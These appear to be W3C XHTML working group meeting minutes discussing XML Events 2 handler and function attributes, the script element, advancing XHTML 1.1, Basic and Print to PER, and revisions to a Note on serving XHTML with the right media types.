RM: if go in through javascript and listen with javascript wouldn't be any different
... listener in script for onLoadEvent would have problem after
... no different from anyone running script using ListenerOnLoad from script interface
SM: 2 diff problems: 1) what to say about handlers module and when registered; 2) if implement to work in existing UAs, how would ensure outcome of issue 1 supported
... not sure we should let decisions about current UAs color the answer
... should say registered prior to onLoad firing
SP: yeah
RM: yeah, but how to achieve?
Nick: can do onLoad then trigger all events waiting for onLoad -- order not defined
SP: could use root elements
... script implemented can do capture onLoad, initialize, then reinitialize onLoad
SM: implementation must behave as if...
RM: yes
SP: yes
RM: such that handlers may listen for onLoad event
SM: can't decide where we need to say this
... in addEventListener description?
... yes
RM: makes sense
SM: reason for confusion is MarkB says that this also wasn't clear from XML Events 1 spec
SP: not the place to do it -- that's an action
... place to talk about it is in the description of the handler attribute
... i think should be under handler attribute
RM: defined on listener element - optional attribute?
SP: yes
... (reads from spec)
... could do in separate location: whenever handler attached explicitly with handler attribute or implicitly
RM: problem saying that - what happens when try to add handler after - bringing script into DOM
... 2 sides: 1) those that are declared in original document will be done before load
SP: discussed before and said that can't do that
RM: should ignore that situation
SP: little point in changing handler attribute via script - if want that effect, can use script already
RM: if put widget in DIV, need assertion -- can't bring in declarative approach to do that
SM: any DOM mutation event should cause the implementation to reexamine tree to ensure all handlers are registered
SP: are you REALLY sure we want that
SM: alternative is build page using AJAX -- if want to work, has to work there too
SP: not sure -- whole point of this markup was to do declaratively so didn't have to use script; if going to use script, use script's function, not declarative markup
RM: may not know if embedded at start-up time or post load
SM: that's my concern too
... don't disagree with SP, but don't know how to accommodate those creating dynamic pages -- added after onLoadEvent fires
RM: could say or provide function to do it - if you insert after a node, have to do something to reparse and register these items
... responsibility, not dogma
SM: address in document conformance?
... or just advice
... more than advice -- have to do it
RM: have to cause script to get executed in some way to get activated
SM: popular AJAX libraries do it by setting flag for javascripting process
RM: need something similar here
SM: where in doc?
RM: processing model, isn't it?
... make topic in subsection 3 - subject of how to cause listeners to be registered
SM: 3.6?
... after event scope
RM: yep
SM: don't need to do in real time - will edit and we can revisit
RM: changed to make eventtarget
SM: other is EventType
RM: other thing that makes sense in this section now -- had scripting module, but also discussion if want handler and a script - this script is a "traditional" script inside handler module
SM: script element that would say "here are my handlers"
RM: script that is only a function
... add script for all reasons have today
SM: reluctant to lose section 5 - no home other than XHTML2 today
RM: keep in there; will review MarkB's issues with Mark - question: define handler or function - function takes to script handler to handler
<alessio> hi all, I don't have Skype here... can I follow you via IRC?
RM: reviewing minutes and email from July
... [to alessio] of course, you are welcome in any way you can participate
<alessio> thx!
RM: shane also included in dialog
SM: handler element included in handler module, right?
RM: yes
SP: where is handler element now?
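The behaviour Shane describes above—walking the tree to register declarative listeners, and re-examining it after dynamic insertions—might be sketched like this. The function name and the node shape are hypothetical (assumption: nodes expose attributes, children, and addEventListener, as DOM elements do); a real implementation would hook DOM mutation events as discussed:

```javascript
// Sketch: walk a subtree and register any declarative listeners found on it.
// Calling this again on a newly inserted subtree (e.g. from a DOM mutation
// hook) re-scans and registers listeners added after onLoad has fired.
function registerListeners(node) {
  const evType = node.attributes && node.attributes['ev:event'];
  if (evType && typeof node.handler === 'function') {
    // simplification: the observer is taken to be the node itself
    node.addEventListener(evType, node.handler, false);
  }
  for (const child of node.children || []) {
    registerListeners(child);
  }
}
```

The point of the sketch is only the ordering question from the discussion: an implementation must behave as if this scan completed before the load event is delivered, so that handlers declared in the original document can themselves listen for onLoad.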
SM: doesn't exist
RM: trying to move away from script
SM: load external things - has @src
SP: handler element versus action element
SM: if action element had @src could fulfil function
RM: leave resources tight
SM: don't want to overload action -- just use handler -- make simpler - doesn't cost anything to have in content model
RM: inside action, put handler
... handler can be child of action
SM: doesn't have to be
RM: but valid cases where one might want to
... other change: option of either specifying want handler to run or function to run; where specify handler and where function?
SM: Roland, do you want @implements on handler element?
GJR: can "see" argument for it, perhaps in case of expert handlers
RM: trying to think of a reason to say no -- seems might confuse things
... depends upon script - script in diff modules - events module, handlers module, and script module
... just section in XHTML2 -- need script out of events module document altogether
SM: case for retention: XML module, not XHTML module; beyond XHTML; like to expose script element to world beyond XML
RM: agree with that statement; bit we need to work on is what script element says -- XML2 script element different in terms of coding, etc.
SM: not really different - tried to normalize
RM: when i looked there were definitely differences between Base and Events
... let's finish off the other piece: option to specify handler (ID) or function
SM: suggesting that be global attribute?
RM: wherever can specify handler, can specify function
SM: yes
... we need to keep in mind that every time we add a global attribute, we pollute the global namespace more
RM: under handler as IDREF?
SM: now a URI
SP: lost use case -- what are we trying to achieve?
RM: either a handler or a script library with all functions
... get functions from script
SP: used default
<Steven> <action id="foo">foobar()</action>
<Steven> <a ev:event="DOMActivate" handler="foo" href=...>Click here</a>
<Roland_> <listener
RM: instead of handler, have to create actionable which has to call function - can't refer to handler from function
SM: like elegance of SP's solution, but entire module has no inline CDATA
SP: even action?
SM: even action
SP: replace with script element
SM: don't know if will work
SP: instead of action above, couldn't i say:
<Steven> <script declare="declare" id="foo">foobar()</script>
SP: question is: how much / how often is the work that a handler does a single function -- this is convenience, not functionality - author convenience to call function
RM: interpretation will be different depending upon culture coming from
TV: what gets loaded and fired; [scribe couldn't hear the rest]
... data model
RM: earlier example in spec: listener > DOMActivate > doit function in script; what to put there?
... if have script function called doit, would have to create intermediary - that would be handler?
SP: or script
SM: all we've done is add a layer of abstraction; still can't get to single function
SP: in my script core is that single function
RM: wouldn't execute, though
SP: with handler=#foo the content of the script gets executed
RM: what would happen today
SP: declare
SM: no such element
<ShaneM> defer [CI] When set, this boolean attribute provides a hint to the user agent that the script is not going to generate any document content (e.g., no "document.write" in javascript) and thus, the user agent can continue parsing and rendering.
SM: there is an attribute "defer" - hints that the script is not going to do document.write()
... we have @declare on the action element
SP: not sure why
TV: no way to tell UA not to execute a piece of script
RM: what led to suggestion of adding function
... still have way of having action invoke function
RM: action has function= -- then no need of another parameter
TV: will some of these things have effect on ????
... 2 - one depends on function that came from ????
... with respect to a javascript node - if script tag has src that gets loaded - trick to make it load is to do document.createElement; do things need to block or can execution/loading of document continue
... all happen after onLoad events fire; if have 2 blocks, 1 dependent upon a quote from the first block, have to find these and define behavior carefully
SM: makes perfect sense
... discussing handler element - decided to introduce; then discussed if needed function attribute as part of global attribute set; now keep handler and that handler can invoke function
... separate modules - XML Events does not require XML Handlers
TV: would like to keep separate if possible
GJR: plus 1
SM: +1
... no way to use listener that ties to a function
RM: handler is always a function that could be specified in a language
TV: other way to fix - declare one of the things in XML Events to be a handler (such as the handler) - handler spec can elaborate on that; XML Events client that doesn't support handler can use module
RM: handler goes to events goes to listener
SM: another option: @handler doesn't get included into global space unless use events as well
TV: handler in handler module
GJR: like way this is headed
RM: need to work out specifics - still question - handler attribute to invoke a script function
SM: also backwards compat - events 1
... happy to define handler element in context of Events Module
SP: in Events 1 did deliberately to try and get others to adopt XML Events
TV: Charlie, is there a Voice group position on this?
SP: other groups think our events are special; almost always turns out that they have relevance or something close to it
... in XForms terms, events don't fire handlers on parts of the tree that are irrelevant
TV: event filtering
SP: interesting; no other spec talks about relevance like that, maybe ought to put into spec; SMIL good example
TV: also gets by the argument that one needs to implement a lot of what one doesn't need to get what one does need
SP: 2 implements: how do you deal with relevance specially
... how to stop events firing on parts of the tree where they shouldn't
Charlie: handlers decide what to do
SP: switch that contains element bound to something that changes, but switch not told; strictly speaking, events should go to that thing and bubble up tree, but currently doesn't
Uli: in Chiba it does
TV: no one should notice bubble on client side
... about 5 years ago had a partial implementation
... event list in XML: can say to handler, fire event under certain criterion -- i am done, don't do any more
... could use XML handler to do conditionality -- if x is true through attributes, then relevant, otherwise not
... target phase, bubble phase or capture phase all should respect conditionality of XML handler
RM: conclusion / agreement?
RESOLUTION: take handler out, put into Events Module; ability to invoke script function will be added to handler
GJR: plus 1
<ShaneM> +1
<alessio> +1

BREAK FOR 30 MINUTES

<ShaneM> omw
<ShaneM> listener says handler="#foo"
<ShaneM> <handler src="whatever" />
<ShaneM> <handler src="whatever#someActionElement" />
GJR: like function better
<ShaneM> <handler src="whatever.js" type="application/javascript" function="whatever" />
SM: trying to understand what this means; using the example above, the system is going to do what?
... load the resource at whatever, find the fragment identified by #someActionElement -- doesn't make sense
<Roland_> <handler src="whatever#someActionElement" />
<ShaneM> <handler id="myhandler" src="whatever.js" type="application/javascript" function="whatever" />
SP: not sure about that
<Roland_> <handler id="foo" src="whatever#someActionElement" />
SM: this is the case we're trying to solve, right?
SP: yes
SM: guess i'm fine with that - would be as easy to put function on listener and be done with it
... handler module describes action element and a way to declaratively define handlers
<ShaneM> <handler id="myhandler" src="#someActionElement" />
RM: doesn't explain in XML Events 1
SM: has to be embedded?
SP: easy to put function on listener, so what is the problem?
RM: do we want another global attribute -- wherever there is a handler attribute there would be a function
SM: hoping to come up with clever way to overload handler
<ShaneM> handler="javascript:function"
RM: one is fragment identifier - URI or function name
SM: that would work today, for what it is worth
RM: wouldn't have to put javascript, just name of function
SP: URI, not CURIE
RM: function: would also be a URI
SP: then have to go to IETF
SM: not a formal javascript
SP: convention
<Steven> javascript:alert("foo")
SM: used for href="javascript..."
SP: Bjoern Hoehrmann tried to register schemes widely used and not registered anywhere -- ran out of time or cycles
RM: function name with brackets
<Roland_> tried-javascript-scheme-00
RM: why not use it?
SM: TAG would have a heart attack
RM: get through LC and put in example
SP: Shane, your example is very clever - would never have come up with that
RM: someone might take this scheme through for all we know
SM: what happens with such a function: does it get passed event context or is it part of the global javascript feed?
RM: as per SP's example
SP: what has TAG against it -- that it's not registered?
SM: TAG doesn't like registering new schemes - want people to use HTTP
... WebAPI group defining widget spec - so could register in DIV - TAG said no; external group (OASIS) tried to register XIT to IETF, failed
<ShaneM> Would this work? foo.js#functionName ?
SP: TAG objects to schemes which are just HTTP in disguise - apple has one, and people just use it
... replace scheme with http, still works
SM: within iPhone architecture itself - when you install an app, it can register a scheme js#functionName
SP: as handler you know # is defined by media type - application/javascript
... then need to look there to find out if can use fragments
<Steven> Scripting Media Types
SM: could put function attribute on it and be done with it
RM: go back to what we're trying to achieve
SM: 99% of today's use cases, @function would satisfy; could put in a note that this can be done with handler at some time in future, but probably want to stay away from that
SP: safest route is another attribute
SM: clearest for constituents
GJR: plus 1
RM: sounds good to me
SM: having said all that, do we still need the handler element?
SP: don't think so
SM: MarkB thinks so -- he introduced this thread
SP: would have to ask Mark
SM: does anyone believe that any scripting language other than javascript will be used?
<ShaneM> Is this adequate?
<ShaneM> <dt id="attr-listener-function">function</dt>
<ShaneM> <dd>The <code>function</code> attribute identifies an optional function name that will be called when the handler is invoked by an event listener.</dd>
+1
RM: function doesn't require javascript - can use other function libraries/languages
RESOLUTION: specify either a handler or a function attribute; if both are specified, @function takes precedence
SM: have abstraction built into spec, don't know if will ever be used
RM: same as in XML Events only with @function added
SM: so XML Script Element
RM: why would it not be the XHTML 1.1 or 1.2 Script Element + @implements?
SM: modules designed to move cleanly into XHTML2; in XHTML2 have broader understanding of i18n; don't care if we do it differently in Script Module, but going to have to change when we move to XHTML2
SM: can do now or later
... HTML 4.01 script is what we care about
<alessio> thx steven
<Steven> :-)
SM: @type in HTML4 is much different than @type in XHTML2
... didn't put defer in here, but could
... what we are trying to accomplish is that this script looks like HTML 4.01 script + @implements
RM: yes, so can implement in existing browsers
SM: if that is the case, we shouldn't have a complex definition of @type in here
... Steven, XML Events 2 right now uses definitions from XHTML2
SP: XHTML2 has extended version of @type, but another app going to use XML Events may not want that definition of @type
... no objection to XML Events 2 having a simpler @type as long as it doesn't ruin the generic @type in XHTML2
... M12n allows us to extend an attribute, right?
SM: sure
... if we agree to change, will rip out the complex content-type language and replace with stuff from HTML 4.01
RM: @id element?
SM: everything has @id in XHTML
RM: id or xml:id
SM: interesting discussion we should have
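Pulling the threads of this discussion together, a listener using the attributes discussed might look like the following sketch. The attribute spellings follow the examples pasted above; `doit` and `calc.js` are made-up names, and per the resolution recorded above, if both handler and function were given, @function would take precedence:

```xml
<!-- a handler loaded from an external script library, invoking one function -->
<handler id="myhandler" src="calc.js" type="application/javascript" function="doit" />

<!-- a listener that names the handler; a function attribute here would win
     over the handler attribute if both were present -->
<listener event="DOMActivate" observer="button1" handler="#myhandler" />
```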
SM: if the goal is that this is used generically in XML languages, it would make sense to remove @id from this spec, which is used in the context of other host languages
RM: agree
SP: everyone uses @id -- allow people to use other attributes -- don't want to replicate the problem with XForms, where we assumed that the host language would define @id and in the end had to put it back in
RM: would be legitimate - don't have to use javascript if have @function
... do we know what we are doing with script?
SM: believe so -- trying to find definition of @id
<alessio> @id could still be useful as an immediate "pointer" for an element
SM: plan with document?
RM: go through changes, review and take to LC
SM: think inherited from HTML 4.01
RM: add to XHTML 1.2?
SM: no
SP: text def of id is "attribute that assigns an identifier to element"
SM: taking high-level details
<ShaneM> <dd>The optional id attribute assigns an identifier to an element. The value of this attribute must be unique within a document. This attribute MUST NOT be specified on an element in conjunction with the xml:id attribute.</dd>
SM: makes sense to mention xml:id here in regard to scripting
... encoding versus charset - what do we want to do?
RM: XHTML 1.0 says what?
SM: changed for XHTML2 in response to comment from i18n
SP: could leave in encoding
... encoding only for the src attribute
SM: want it to map cleanly to script in HTML 4.01
SP: 2 options: leave; include both to allow for future developments; or just add in XHTML2
RM: add in XHTML2 and deprecate the old one
SM: put in note: "in future version of module expect to change base encoding..."
RM: don't know what value that adds other than to melt minds
SM: ok
... now have: @src, @type, @implements - do we need @defer? think it has no semantics and we should skip it
RM: if have no use for it, leave it out
... is it in XHTML 1.0?
SP: everything is in 1.0
RM: XHTML 1.1?
<alessio> @SM I agree
SM: in 1.1
RM: same as 1.1 with addition of @implements - the XHTML2 script element
RESOLUTION: keep everything from the XHTML 1.0 definition of script
RM: finished topic?
SM: think so
RM: topic we haven't addressed: now that we have M12n as a Rec, we need to update our other specs - can we discuss after lunch -- fallout from getting M12n to Rec
SM: pretty sure it's all in mail
<Roland_> Now that XHTML M12N 1.1 is a REC, we need to update our other specs. There are new versions in shape for PER that include the schema implementations. They include XHTML 1.1, XHTML Basic 1.1, XHTML Print 1.0, and RDFa Syntax 1.0. We should decide a strategy for moving these forward.
SP: Basic, Print, and RDFa
RM: 1.1 Second Edition
SM: will all be second editions
RM: 1.1 SE has been waiting for M12n for quite a while
... strategy?
SP: add reference and shove out there
SM: updated all drafts as SE and they are all ready to go
SP: way to go Shane!
SM: think these are PERs per W3C process
SP: that's right
SM: can't imagine any real contention or difficulty in moving forward
... check errata to ensure all addressed
... RDFa Syntax is the odd man out; asked Melinda to ask the XHTML Print community for errata; Print, Basic and XHTML 1.1 we can submit as a single submission: same style of change, etc.
RM: seems reasonable: M12n is the underpinning
... Basic is so new, don't think there is errata for that yet
... www-html-editor is where to find errata?
SM: yep
RM: fun for the whole family...
SM: RDFa Syntax unusual - produced in conjunction with another group in a Task Force - up to TF to decide to take to PER?
... my guess is Ben will want to do a stability check on it first
... W3C process questions for SP: Basic, Print, and XHTML 1.1
SP: if errata, work them in, add schemas and then submit
SM: submit all in one transition call
SP: best approach
SM: concerned about tracking errata -- need to do a sweep of www-html-editor for the last 5 years
SP: can guarantee that when producing the agenda, every time something new appeared on html-editor, i put it on the agenda, so i think we only need to do a year's trawling/trolling
SM: never added anything to an errata document ever
... troll agenda to find issues identified; just need to ensure each resulted in a decision
... according to Melinda, 2 typos, which i fixed
... Print went to Rec in September 2006
SP: comment on fieldset sub-elements; Shane and Melinda replied
... fieldset asked and disposed - no other comments on Print
RM: looking for mentions of XHTML 1.1 in html-editor
... flattened DTD
... talking about second edition flattened DTD so that's ok
... most recent one - replied
SM: if any stuff needs to be updated, we should do it; technically, if stuff is in the errata doc, it should be reflected, but the errata docs are empty
... all indications are that there aren't any dangling errata
SP: isn't Myakura our Basic rep -- he is here now, so let's ask him
<Steven> Myakura?
<myakura> yes?
<ShaneM> are you aware of any errata or comments against XHTML Basic 1.1 as of yet?
<myakura> ShaneM: not really.
<myakura> no probs :)
SM: not obvious how to use XSV
SP: bad user interface
SM: was able to use it to validate the schema, along with oXygen and other tools
... reasonably confident, but until we use the schema in anger, won't know if it works
SP: could provide an interface -- validate your doc against any of these schemas - an XHTML validator
SM: not a bad idea
... need to resolve to move to PER as soon as possible
RESOLUTION: take Basic 1.1, Print 1.1, XHTML 1.1 to PER as soon as errata check finished
SP: will email RDFa task force about movement on that front
<ShaneM> updated draft with schema of RDFa Syntax is at

ADJOURN FOR LUNCH: RETURN IN 60 MINUTES

[fyi] Using ARIA Live Regions to Make Twitter Tweet:
aloha, alessio -- i have a question for you (and possibly diego and roberto) about iframe - i haven't finished the message yet, but i think i did point you to it
problem is, there aren't any com ports anymore for hardware TTS, and the newer screen readers don't support hardware TTS, which is why i'm trying to work with the RNIB on a sourceforge project for hardware speech support for stuff like NVDA
<ShaneM> in your copious free time?
something like that -- it's just that if NVDA wants to get ANY market penetration into the mainstream it HAS to support older tech, as hardware synths were VERY expensive
i'm looking for others to do the coding - i'm just simon legree trying to harvest graduate students
which is always a dangerous thing
<ShaneM> can be rewarding
but yeah - takes a lot of effort
you said it -- that's why even the "mainstream" ATs are moving towards software everything
but 70% of the target population is unemployed
statistics that are similar throughout the "developed" world
<ShaneM> thats a shockingly high number.
sometime you will have to explain to me how that 70% eats
which is why i've been trying to get WAI to set up proxy servers for 12 years -- see if the concept/fix works and if it does, implement it, but leave the proxy up there for those whose hardware is "frozen in time"
food stamps
<Roland_> I do not, but my "vanilla" dog didn't really like stamps
<Roland_> 06postma01n
those are the numbers according to AFB (in USA), RNIB (in UK), and Australia & NZ
that's one postman who won't ring twice
<ShaneM> are we getting ready to restart?
to see what most blind people are dealing with, check
1 hour, 10 minutes & 56 seconds according to my stopwatch since we broke
i have a stopwatch on my talking watch
<ShaneM> zakim left us
steven dismissed him
<Steven> Di not
<Steven> did not
they have to connect first
oh, then maybe it was roland

RESOLUTION: take handler out, put into Events Module; ability to invoke script function will be added to handler
RESOLUTION: specify either a handler or a function attribute; if both are specified, @function takes precedence
RESOLUTION: keep everything from the XHTML 1.1 definition of script

RM: Shane had a dialog with a commenter
"We recommend that XHTML be delivered as HTML, but that means it is not valid HTML. Do we care?" (above from agenda)
SM: high level: applied most of Simon's edits; not much from others
... asked for clarification on a few issues and he did that
... in this document - original Note and updating - original Note did a thorough job of looking at all media types that might deliver an XML/XHTML document
... does it make sense to talk about DTDs and discourage their use?
... Section 3.3 - application/xml
SP: (reads document)
... worth pointing out that can do it, but may not always be processed as XHTML
RM: while it may work, recommend you don't do this
... shouldn't we recommend one over the other?
SP: allow both, not champion one over the other - ok to serve HTML to an XML processor
RM: application/xml and application/xhtml+xml - we have to say different things about them
... what it is that we recommend one should or should not do with them
... you MAY or you SHOULD?
... who is meant to read the document?
SM: document authors
RM: shouldn't we then be more explicit about the XHTML family and modularization?
SM: don't know how to answer that question
RM: less technically correct - this applies to XHTML 1.0, XHTML 1.1 or XHTML Basic 1.1
SM: doesn't just apply to those
RM: XHTML Basic 1.1 - adoption by an author application of XHTML Modularization
... can we put it that way -- if it begins with X, then it is XHTML and an author application of modularization
SM: if this doc talks about M12n anywhere, it's a mistake
... mentions Rec
RM: (reads from abstract)
... is that really the case?
... that's why there are XHTML Media Types - only read this doc if you want to write XHTML and know how to best get it processed by a user agent
SM: ok
RM: this is a Note produced by us
... Introduction
... talks about XHTML 1 versus HTML 4.01
SM: historical data
RM: Introduction: brief summary
RM: some stuff we don't want - they chose the language, so will get what they get - it's the language designer, not M12n, that made that decision
... too much for people to say "do i have to worry about all this? i'll just use HTML 4.01"
SM: ok - strike first paragraph?
RM: actually last paragraph
SM: happy to reword, but last paragraph addresses objection Tina had (we really should tell people to use HTML4 unless they need XHTML) - reasonable - don't jump through hoops if you don't have to
RM: terms and definitions - XHTML Family Document Type: "A document type which belongs to the family of XHTML document types. Such document types,
RM: support XHTML, but does "host language document type" matter to the reader of the doc?
SM: defined because the term is used in the previous definition - you are right - more academic approach than needed
RM: Section 3.2
SM: only docs that adhere to our structural reqs can use this media type
<alessio> agree with roland
RM: that's why I'm concentrating on reading from the author's PoV
same with application type - obscure terms versus critical terms
... if i am a document author, don't need to understand a lot of what is explained
GJR: agree -- type of thing that makes people say "it's all geek to me"
<alessio> yeah, that's true gregory
RM: just tell me what to do, save theory for another document
SM: originally not intended for document authors as it was to explain to XHTML2 what works and what doesn't in real world
RM: significance check of terms - integration document set; host language document type
SM: in previous term define XHTML family; would define XHTML Family by turning def around
Section 3: 3. Recommended Media Type Usage
RM: looks clear to me
@@@@Issue: Do we believe that XHTML documents that adhere to the guidelines are "valid" HTML? Should that be a goal?@@@@
SM: Simon objects to this; i may be being obtuse
SP: what is objection
SM: thinks we are defining content-negotiation and are doing it ppoorly
... shouldn't be redefining rules of content negotiations in doc
... hadn't considered that problem; thinking had been if UA prefers text/html, give in xhtml because that is what it is
RM: if accept header that states application/xhtml+xml ...
<ShaneM> if the Accept header explicitly contains <code>application/xhtml+xml</code>
<ShaneM> and prefers it over other types
<ShaneM> deliver the document using that media type.
<Steven> then deliver as xhtml because that is what it is
SP: what is our aim? deliver XHTML - so deliver as xhtml, and problem over
SM: exactly
SP: trying to say if doesn't accept xhtml, have to do something else
SM: if that is case - what WG wants to say - not defining content negotiation, but telling author if explicitly containx xhtml (with no Qvalue) deliver using that media type
... point 2: if explicitly contains xhtml ... (missed)
... point 3: if */*, then deliver what can
RM: if text/html and xhtml, regardless of priorities, serve xhtml
...
if can handle xhtml, always parse the xhtml
SM: anything beyond point 4 is gilding the lilly
RM: doesn't recommend xhtml text/html or */* - have to know what media types DOM is capable of - no recommendation
GJR: makes sense, can only tell authors what to do, can't control parsing
SP: want to say right up front that not redefining content negotiation
RM: yes, need to make very clear
<ShaneM> This section summarizes which Internet media type should
<ShaneM> be used for which XHTML Family document for which purpose.
<ShaneM> Note that while some suggestions are made in this section with
<ShaneM> regard to content delivery, this section is by no means
<ShaneM> a comprehensive discussion of content negotiation techniques.
plus 1 to general gist
RM: state intended readership up front?
SM: yes, definitely
<ShaneM> abstract: Many people want to use XHTML to author their web pages, but are confused
<ShaneM> about the best ways to deliver those pages in such a way that they will be
<ShaneM> processed correctly by various user agents. This Note contains
<ShaneM> suggestions
<ShaneM> about how to format XHTML to ensure it is maximally portable, and how to deliver
<ShaneM> XHTML to various user agents - even those that do not yet support XHTML natively.
<ShaneM> This document is intended to be used by document authors who want to use
<ShaneM> XHTML today, but want to be confident that their XHTML content is going to
<ShaneM> work in the greatest number of environments.
<alessio> it has "pratical" sense...
<Steven> Looks good to me
<alessio> yes, me too
SM: Section 3 - what to do when XML doc does not adhere to guidelines
... if doesn't adhere, don't send as text/html - needs transformation, not false declaration
... Simon pointed out should deliver html documents because not valid
SP: should be saying "getting XHTML into browser"
RM: if you do these things, it will be sufficient to get effect you want in most UAs
SM: Steven, strike entire paragraph?
RM: maybe should say nothing
SM: it is about document performance, not UA limitatinos
RM: use at own risk - will evolve -- suggestions to improve chances
SM: up to us to keep document up to date - fix, and update periodically
... strike entire paragraph?
<ShaneM> Steve suggested: When an XHTML document does NOT adhere to the guidelines, it should only be delivered as media type <code>application/xhtml+xml</code>.
RM: strike it and see
SM: added at specific request
RM: pragmatic, not purist, document
SM: removed all RFC2119 words
... remove about transforming into HTML?
... haven't removed any guidelines, but rules in 1.0 still in document - backwards compatibility there
GJR: right
SM: Simon said "why still asserting this - no longer relevant" - no longer relevant to opera 9, but where does that get the world?
"q" parameter of the media type could help a server determine which of several versions of a document to deliver - thereby allowing server-side customization of content for specific cla
SP: XHTML Basic gets delivered with profile
... OMA spec includes something along those lines
RM: what would make me do something different in raction to note?
SM: none - remove
RM: should be as short as we can make it and no shorter
SM: section 3.2 should be 3.1
RM: seemed out of order to me
... when conforms to guidelines in this document "carefully constrcuted" means what?
SM: will fix
... character encoding
RM: trying to figure out how to express why matters to me as author
SM: don't need to give all background; just tell them what to do
... doesn't tell what to do anyway
... GL9 in Appendixl: Simon said example silly (change to japanese at end)
RM: beware of character encoding issues, in particular GL/A.9
... why reiterate?
... if have guidelines, point to them, don't reiterate them
SM: if content in here i care about, will push down to guidelines
... 3.3. 'application/xml'
RM: all is honky-dory - procede - no problem
... run through validator; if valid, procede
...
bit of overkill
SM: put in because validator people trying to enforce validity guidelines
s/SM: 3.3 'application/xml'/SM: 3.2 application/xhtml+xml
SM: XML stylesheet processing instructions? keep?
SP: idea that this is XML so should use XML features where possible; when XML and HTML feaature, XML feature should get priority
SM: not XSLT, but sytlesheet PI
... will just remove paragraph
... final paragraph - character encoding issues
RM: thought was all utf-8
SM: if serving as text/html can serve as whatever you want
RM: recommendations? HTML4 as well as XHTML
SM: if that is the case shouldn't be telling people to ignore guidelines
... if message is you care about portability, follow the guidelines
RM: content-encoding
... circular reference
SM: doesn't depend on RFC
... documented in 3.3 - says same thing we already believe it wants
... will be document processing agents, not user agents - search engines, and trawling tools
RM: 3rd paragraph - "generic user agent"
... user agent give what it asks for, don't worry about it
SM: suggest leave 3.3 and 3.4 - remove references to other media types from this document
RM: reference 3.3 to 3.2
SM: think can remove summary section
RM: refer to it early on
... looks too complicated
... althought will be a lot smaller
SM: we've said what preference rules are and why should use; at beginning of section 3, should expand on it - already did
... in section on application/xhml+xml - if document uses other namespaces MUST use this mime type
RM: reverse and put in other section
... Appendix A looks better with DO NOTs and DOs
... Appendix A
... Appendix A.1 - sounds good
SM: made all changes SimonP wanted, so should be satisfied - when done with whinnowing process, we should go back and add more examples
RM: A.2, A.3 fine to me
SM: added extras to A.4
RM: A.4 actually works?
SM: yes
RM: will be using
SM: A.5 because is allowed
...
A.6 missing - deleted rule - reluctant to renumber other rules because map to XHTML 1.0
SP: could say A.6 Deleted
RM: or superseded by events
GJR: thanks for A.7
SM: need to complete second "DO NOT"
RM: should not use one or the other
SM: rationale says why
... reinforces why need to reintroduce into XHTML2
... A.8 Fragment Identifiers
SP: very good
GJR: 2 thumbs up (guess where)
SM: meta stuff addressed in: covered here
... changed EUC-JP to utf-8
RM: Move on to Appendix A.10
SM: not sure got this right
... can rely on html DOM methods; overlap with XHTML DOM; but XHTML DOM not going to return elements and attributes in upper case
... think portable is: rely upon the DOM
SP: all need to say
SM: bit about element and attribute names meaningful - uppercase versus lowercase
RM: if want to be case insensitive, use lower, otherwise will have to use camelcase
... be sensitive to case
SM: DO ensure element and attribute names are case insensitive in your scripts.
RM: A.12 seems fine
... just needs examples
<alessio> yes
RM: A.14 - ok
... A.15 formfeed character
SP: fixed in later XML
RM: no harm in doing this
... A.16 - ok
... A.17 The XML DTD Internal Subset
SM: A.18 perhaps too strong "DO NOT use the XML CDATA mechanism."
SM: contradict with A.4 - bring into harmony
RM: A.19 - just tbody?
SM: thought were ignored, not inferred?
... don't think are in DOM
... Steven, might be right that there is another inferred element
SP: context of stylesheets, think just tbody
RM: DO use the base element if you need to establish an alternate base URI for your document. should be in same block as "DO NOT use the xml:base element."
... document.write - do not use
SM: wondering if rationale is right
SP: parsing models for XML doesn't require halving on fly; document.write only works with streaming parsers, so shouldn't use it; might do reader some good explaining how to do so modifies DOM directly
SM: a "do" clause?
RM: if this is what you ar etrying to achieve, use DOM manipulation to achieve same effect
... 22 application/xml and the DOM
SM: get rid of it?
SP: yes,
SM: 23 put in over tina's objection "updating document using innerHTML"
SP: is this difference between HTML and XHTML rule
SM: simon said ensure content is well formed and here is GL if going to
RM: reasonable caveat
SM: took one step further
RM: example, such as that needed for document.write - show how to do properly if need to do it
... 24 scripts and missing tbody elemtns
SP: still don't understand why 23 in here?
SM: have to ensure that conforms to GL if going to insert it
SP: link should be in rationale
... 25 says too much and too little "Rationale: In HTML 4, these properties were often specified on the body element. CSS specifies that in XHTML they need to be specified on the html element in order to apply to the entire viewport."
SM: and CSS spec says works that way
SP: insisted spec say that because couldn't do any other way - compromise
... ensure any CSS properties on HTML element are also specified on BODY element
... warning is: if serve XHTML as xhtml, garuntee that CSS will work - if serve as html will work in some browsers and not in others
SM: diff problem - CSS on body element, syles bounding box of body, not viewport
... very different effects
SP: standard thing to do is switch everything off HTML and onto BODY
... On some user agents, put initial sytling on HTML some on BODY, so have to code CSS to take that to into account
SM: ensure properties on HTML also on BODY is fine
SP: rationale is some UAs recognize in BODY or HTML
SM: 26 - didn't realize problem with noscript
... if scripting is enabled, contents of noscript parsed as CCDATA if script parsed as CDATA
SM: 27 iframe Element
SP: noscript needed because of document.write
SM: thought no script was for alternative to script
SP: if do all with DOM mutations, initial version of document can contain script that deletes the element
...
functionality is there if use script - if use document.write version to change then do need noscript to catch that
SM: 37 iframe Element
SP: need explanation
SM: simon says content is parsed differently - in HTML parsed as CDATA when scripting enabled, or PCDATA when scripting disabled, but in XML alwasy parsed as CDATA - same problem as noscript
... don't know if compatibility issue
SP: not only if evaluated as HTML or XHTML but whether scripting enabled or not
SM: need to copy bit from noscript one
1. What is the current state of accessibility of IFRAME?
2. What are the outstanding accessibility problems inherit to IFRAME, or have they been mitigated? HTML5) with OpenAjax's support for iFrames?
RM: good if have demonstrative positive example will benefit intended reader base
<alessio> we could investigate possible interactions between IFRAME and wai-aria
SP: ODF wants to use RDFa in documents, and wanted to use xml:broccoli - allowed according to namespacing rules
@alessio -- yes, definitely
SM: RDFa - does it define an attribute collection?
... Metadata Attribute Collection
<ShaneM>
SP: CC message to group or just to ODF inquirer?
<Steven> I just messaged the guy
<Steven> since he sent it to me only
SP: all our ducks are in a row
SM: at last f2f we agreed that i was to rip out all sections duplicating content of other specs, then refer to them and then be done
... then thought bad idead beacuse refer to attributes that aren't defined in spec
... have to include placeholders in spec
... told me to rip that all out
SP: if go to Forms section, tells me what i need to know
SM: thought i was supposed to take that out
RM: pointer saying there is this module and the module is elsewhere; summary in XHTML2 or statement "here is module, here is pointer"
SM: like that tact
<ShaneM> XHTMLMIME is updated
